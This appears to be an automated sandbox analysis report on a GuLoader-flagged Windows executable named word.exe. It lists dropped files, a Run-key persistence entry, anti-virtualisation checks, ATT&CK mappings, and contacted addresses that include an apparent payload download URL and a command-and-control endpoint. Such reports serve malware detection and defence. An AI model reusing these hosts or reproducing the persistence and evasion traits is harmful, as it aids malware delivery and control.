Source: C:\Users\user\Desktop\word.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

File written: C:\Users\user\AppData\Local\Temp\Setup.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\word.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: word.exe

Static PE information: certificate valid

Source: word.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, type: DROPPED

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: System.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1014f
Source: word.exe	Static PE information: real checksum: 0xb3966 should be: 0xb47c4
Source: Julenissen.exe.21.dr	Static PE information: real checksum: 0xb3966 should be: 0xb47c4

Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_10002D30 push eax; ret		0_2_10002D5E
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_0015275A pushad ; retf 37DBh		21_2_0015277D

Source: C:\Users\user\Desktop\word.exe	File created: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe			Jump to dropped file
Source: C:\Users\user\Desktop\word.exe	File created: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\word.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Run

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\Performance

Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\word.exe	API/Special instruction interceptor: Address: 7302C33
Source: C:\Users\user\Desktop\word.exe	API/Special instruction interceptor: Address: 58D2C33

Source: C:\Users\user\Desktop\word.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Memory allocated: 37E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Memory allocated: 39E60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\word.exe

API coverage: 0.2 %

Source: C:\Users\user\Desktop\word.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\word.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_004055B1
Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00402645 FindFirstFileA,	21_2_00402645
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00405FF5 FindFirstFileA,FindClose,	21_2_00405FF5
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	21_2_004055B1

Source: C:\Users\user\Desktop\word.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus
Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q!Hyper-V Hypervisor Root Partition
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q*Hyper-V Dynamic Memory Integration Service
Source: word.exe, 00000015.00000003.1818293472.000000003C7C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: word.exe, 00000015.00000003.1819484760.000000003C793000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000003.1822603900.000000003C793000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitiona
Source: word.exe, 00000015.00000003.1822177141.000000003C91C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %u<WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Process
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q$Hyper-V Hypervisor Logical Processor
Source: word.exe, 00000015.00000003.1821690930.000000003C7F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q!Hyper-V Virtual Machine Bus Pipes
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)Hyper-V Hypervisor Root Virtual Processor
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: word.exe, 00000015.00000003.1826101326.000000003A0B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Servicelm
Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes'

Source: C:\Users\user\Desktop\word.exe	API call chain: ExitProcess graph end node			graph_0-4259
Source: C:\Users\user\Desktop\word.exe	API call chain: ExitProcess graph end node			graph_0-4423

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryExA,GetProcAddress,FreeLibrary,

0_2_00401F68

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: C:\Users\user\Desktop\word.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"

Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Queries volume information: C:\Users\user\Desktop\word.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_00405D13 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D13

Source: C:\Users\user\Desktop\word.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Windows Service	1 Windows Service	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	114 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
word.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	0%	Avira URL Cloud	safe
https://www.ssl.com/repository0	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
https://filedn.com/lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin	0%	Avira URL Cloud	safe
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0?	0%	Avira URL Cloud	safe
http://certificate.crt/localhosthttp://localhost/7	0%	Avira URL Cloud	safe
https://186.2.171.76/agent.ashx$	0%	Avira URL Cloud	safe
http://certificate.crt/	0%	Avira URL Cloud	safe
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0	0%	Avira URL Cloud	safe
http://certificate.crt/localhostsihttp://localhost/o	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0_	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	0%	Avira URL Cloud	safe
https://186.2.171.76/agent.ashx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
filedn.com	74.120.9.25	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://filedn.com/lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin	false	Avira URL Cloud: safe	unknown
https://186.2.171.76/agent.ashx	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificate.crt/	word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	word.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://186.2.171.76/agent.ashx$	word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificate.crt/localhosthttp://localhost/7	word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ssl.com/repository0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0?	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0_	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificate.crt/localhostsihttp://localhost/o	word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	word.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
186.2.171.76	unknown	Belize		262254	DDOS-GUARDCORPBZ	false
74.120.9.25	filedn.com	United States		7366	LEMURIACOUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1497467
Start date and time:	2024-08-22 16:05:29 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 19m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
